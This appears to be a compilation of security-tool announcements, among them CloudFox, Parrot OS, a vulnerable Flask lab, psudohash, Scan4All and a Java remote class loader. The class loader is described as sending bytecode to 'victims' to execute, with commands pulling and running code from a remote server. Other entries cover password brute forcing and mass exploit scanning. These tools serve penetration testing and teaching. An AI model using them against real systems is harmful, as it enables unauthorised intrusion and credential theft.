AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.?

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance with a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. It gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors is that you don't have permission to make the calls CloudFox is making, either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs), or because an SCP is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that make the distribution faster and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third-party and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest updating your system to make sure it is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade

or

  • sudo apt update && sudo apt full-upgrade

Even though we recommend always updating your system, we also recommend making a backup and re-installing the latest version for a cleaner and more reliable user experience, especially if you are upgrading from a very old version of Parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the info about the new kernel 5.18 by clicking on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or LibreOffice 7.4. This is part of our commitment to provide the latest versions of the most important software while keeping a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some of its key packages, like parrot-menu, which now provides additional launchers for our newly imported tools; or parrot-core, which now provides a new Firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhaul

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically, without having to set up proxy settings for each individual program, and prevents traffic leaks in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.



Arsenal - Recon Tool installer



Arsenal is a simple shell script (Bash) that installs the most important tools and requirements for your environment, saving you the time of installing them all manually.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. Its goal is to help you efficiently assess which assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust

Go-lang installation

sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
# Add the following lines to /etc/profile or ~/.profile:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile # reload your shell configuration

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Erlik 2 - Vulnerable-Flask-App


Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1

Description

It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload

Installation

git clone https://github.com/anil-yelken/Vulnerable-Flask-App

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt

Usage

python3 vulnerable-flask-app.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in cyber security have increased greatly. Vulnerability management, penetration tests, and various analyses are carried out to determine accurately how much our institutions can be affected by cyber threats. Tenable Nessus, the industry leader in vulnerability management tools, can detect an IP address that has just joined the corporate network, a newly opened port, or an exploitable vulnerability; this Python application integrates with Tenable Nessus to identify these events automatically.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt

Usage

The SIEM IP address in the code should be changed.

To detect a new IP address reliably, the script checks whether the phrase "Host Discovery" appears in the Nessus scan name, records the live IP addresses in the database with a timestamp, and sends any new (difference) IP address to the SIEM. The contents of the hosts table look as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the script records port-IP-timestamp information in the database, detects a newly opened service by comparing against the database, and transmits the data to the SIEM in the form "New Port: port-IP-timestamp". A sketch of this pattern follows the usage line below. The result observed by the SIEM is as follows:

Usage: python finding-new-port-nessus.py
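
The following is an illustrative sketch of that record-and-diff pattern (not the tool's actual code; the SIEM address and table layout are assumptions):

# Illustrative sketch only: record host/port findings with a timestamp in
# SQLite and forward unseen pairs to a SIEM via UDP syslog.
import socket
import sqlite3
from datetime import datetime

SIEM_ADDR = ("192.168.1.10", 514)  # hypothetical SIEM IP/port

db = sqlite3.connect("nessus.db")
db.execute("CREATE TABLE IF NOT EXISTS ports "
           "(host TEXT, port INTEGER, first_seen TEXT, UNIQUE(host, port))")

def report_new_port(host, port):
    seen = db.execute("SELECT 1 FROM ports WHERE host=? AND port=?",
                      (host, port)).fetchone()
    if seen is None:  # first time this host:port pair appears
        stamp = datetime.now().isoformat(timespec="seconds")
        db.execute("INSERT INTO ports VALUES (?, ?, ?)", (host, port, stamp))
        db.commit()
        msg = f"New Port: {port}-{host}-{stamp}"
        socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(msg.encode(), SIEM_ADDR)

report_new_port("10.0.0.5", 8080)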

Among the findings of vulnerability scans in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database and transmits this information to the SIEM whenever it finds a new exploitable vulnerability on the systems. Exploitable vulnerabilities observed by the SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using the Java ClassLoader together with the Reflect API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using the ChaCha20 cipher (see the sketch after this list)
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts
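
To illustrate the in-transit encryption idea only (the tool itself is Java; this Python/pycryptodome sketch is an assumption, not its code), a 256-bit key is shared out of band in base64, like the -key argument shown under Usage:

import base64
from Crypto.Cipher import ChaCha20          # pip install pycryptodome
from Crypto.Random import get_random_bytes

key = get_random_bytes(32)                     # 256-bit secret key
print("key:", base64.b64encode(key).decode())  # share with the client

cipher = ChaCha20.new(key=key)                 # fresh random nonce per message
ciphertext = cipher.encrypt(b"class file bytes...")

# The receiver needs the nonce along with the ciphertext:
plaintext = ChaCha20.new(key=key, nonce=cipher.nonce).decrypt(ciphertext)
assert plaintext == b"class file bytes..."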

Installation

The tool has been tested using OpenJDK 11 with the JRE Java package, on both Windows and Linux (zip portable version). The Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
    public static String exec() {
        String output = "";
        try {
            output = "Hello world from client!";
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output;
    }
}

Then compile it (e.g. javac Payload.java) to produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting the class file from the server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy and the location obtained via the HTML5 geolocation feature, as sketched below.
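
A minimal sketch of the scapy side (illustrative, not ssidBul.py itself; the monitor-mode interface name is an assumption) that prints records in the same timestamp|MAC|SSID format shown under Usage:

from datetime import datetime
from scapy.all import sniff
from scapy.layers.dot11 import Dot11Beacon, Dot11Elt

def handler(pkt):
    # The first Dot11Elt of a beacon frame carries the SSID.
    if pkt.haslayer(Dot11Beacon):
        ssid = pkt[Dot11Elt].info.decode(errors="ignore")
        stamp = datetime.now().strftime("%d %B %Y %I:%M%p")
        print(f"{stamp}|{pkt.addr2}|{ssid}")

sniff(iface="wlan0mon", prn=handler, store=False)  # interface name assumed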


Usage

I cannot be held responsible for malicious use of the tool.

ssidBul.py has been tested with a TP-LINK TL-WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. The Firefox geckodriver is located in the same directory as the scripts.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)


A dead link (broken link) is a link within a web page that can no longer be reached. These links can have a negative impact on SEO and security. This tool makes them easy to identify and fix.


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrency
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Have Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords have been leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation, to make it harder for an attacker to conduct brute force attacks.
    • AES-GCM-256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity. (Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords have been leaked before, to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 hex characters to XposedOrNot (see the sketch below).
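
A minimal sketch of that check's client side (assuming the pycryptodome package for the original Keccak; hashlib's sha3_512 uses different padding and would give different digests):

from Crypto.Hash import keccak  # pip install pycryptodome

def leaked_prefix(password):
    # keccak-512 digest; only the first 10 hex characters would ever
    # leave the machine, as described above.
    h = keccak.new(digest_bits=512)
    h.update(password.encode())
    return h.hexdigest()[:10]

print(leaked_prefix("hunter2"))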

Installation

Pmanager depends on the "pkg-config" and "libssl-dev" packages on Ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file for your current OS from releases, add the binary location to the PATH environment variable, and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system, but you should be able to build it from source ("cargo build --release"), since there is no OS-specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses the
xposedornot api. This check is achieved by hashing the specified domain's password and
sending the first 10 hexadecimal characters to the xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



SpyCast - A Crossplatform mDNS Enumeration Tool


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.
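
SpyCast itself is written in Rust, but for a rough feel of what active-mode enumeration does, here is an analogous Python sketch using the zeroconf package (an assumption, unrelated to SpyCast's code) that browses a single service type:

from zeroconf import ServiceBrowser, Zeroconf  # pip install zeroconf

class Listener:
    # Print each discovered service and its resolved addresses.
    def add_service(self, zc, type_, name):
        info = zc.get_service_info(type_, name)
        print(name, "->", info.parsed_addresses() if info else "?")

    def update_service(self, zc, type_, name):
        pass

    def remove_service(self, zc, type_, name):
        print(name, "removed")

zc = Zeroconf()
browser = ServiceBrowser(zc, "_http._tcp.local.", Listener())
input("Browsing _http._tcp.local. ... press Enter to stop\n")
zc.close()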


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive

Other options

Run spycast --help for the complete list of options.

License

This project is made with ♥ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc.), applications, or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding, and more. Take a look at the following example:

 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
    {'a' : '@'},
    {'b' : '8'},
    {'e' : '3'},
    {'g' : ['9', '6']},
    {'i' : ['1', '!']},
    {'o' : '0'},
    {'s' : ['$', '5']},
    {'t' : '7'}
]
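
To illustrate the substitution idea only (this sketch is not psudohash's actual implementation), the following expands a keyword into every variant allowed by such a schema:

from itertools import product

# Illustrative only, not psudohash's code: expand a keyword into all
# variants allowed by a substitution schema like the one above.
transformations = {
    'a': ['@'], 'b': ['8'], 'e': ['3'], 'g': ['9', '6'],
    'i': ['1', '!'], 'o': ['0'], 's': ['$', '5'], 't': ['7'],
}

def mutations(word):
    # Each character may stay as-is or become any of its substitutes.
    choices = [[c] + transformations.get(c.lower(), []) for c in word]
    for combo in product(*choices):
        yield ''.join(combo)

print(sorted(mutations('pass')))  # 18 variants, e.g. 'p@$$', 'pa5s', ...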

Individuals

When it comes to people, I think we all have (more or less) set passwords using a mutation of one or more words that mean something to us, e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end, or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc.; fully automated and intelligent red team tooling. Code-level optimization, parameter optimization, and individual modules (such as vscan's filefuzz) have been rewritten for these integrated projects. In principle, the wheel is not reinvented unless there are bugs or problems.
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Supports password brute forcing for 21 services, with custom dictionaries; enabled via "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detects MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE-2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detects whether nmap is present on the system; priorityNmap=true (enabled by default) uses nmap for fast scanning, and the optimized nmap parameters are faster than masscan. Disadvantage of using nmap: on a bad network, the large traffic volume may lead to incomplete results. Using nmap additionally requires setting the root password in an environment variable:

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh. By default, naabu is used to complete port scanning; use -stats=true to view the scanning progress. Can I skip port scanning?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG        COUNT   AUTHOR          COUNT   DIRECTORY          COUNT   SEVERITY   COUNT   TYPE      COUNT
cve        1294    daffainfo       605     cves               1277    info       1352    http      3554
panel      591     dhiyaneshdk     503     exposed-panels     600     high       938     file      76
lfi        486     pikpikcu        321     vulnerabilities    493     medium     766     network   50
xss        439     pdteam          269     technologies       266     critical   436     dns       17
wordpress  401     geeknik         187     exposures          254     low        211
exposure   355     dwisiswant0     169     misconfiguration   207     unknown    7
cve2021    322     0x_akoko        154     token-spray        206
rce        313     princechaddha   147     workflows          187
wp-plugin  297     pussycat0x      128     default-logins     101
tech       282     gy741           126     file               76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis automatically correlates domain names found in SSL information, such as *.xxx.com, completes subdomain traversal according to the configuration, and automatically adds the results as targets to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, port scans are merged to improve efficiency
      2. Intelligently handles abnormal HTTP pages, with fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug where your target information was passed to the DNS Log server, to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch in batches
    • A golang version will be implemented when time allows. How to use it:
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • Supports HTTP Request Smuggling: CL-TE, TE-CL, TE-TE, CL_CL, BaseErr


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

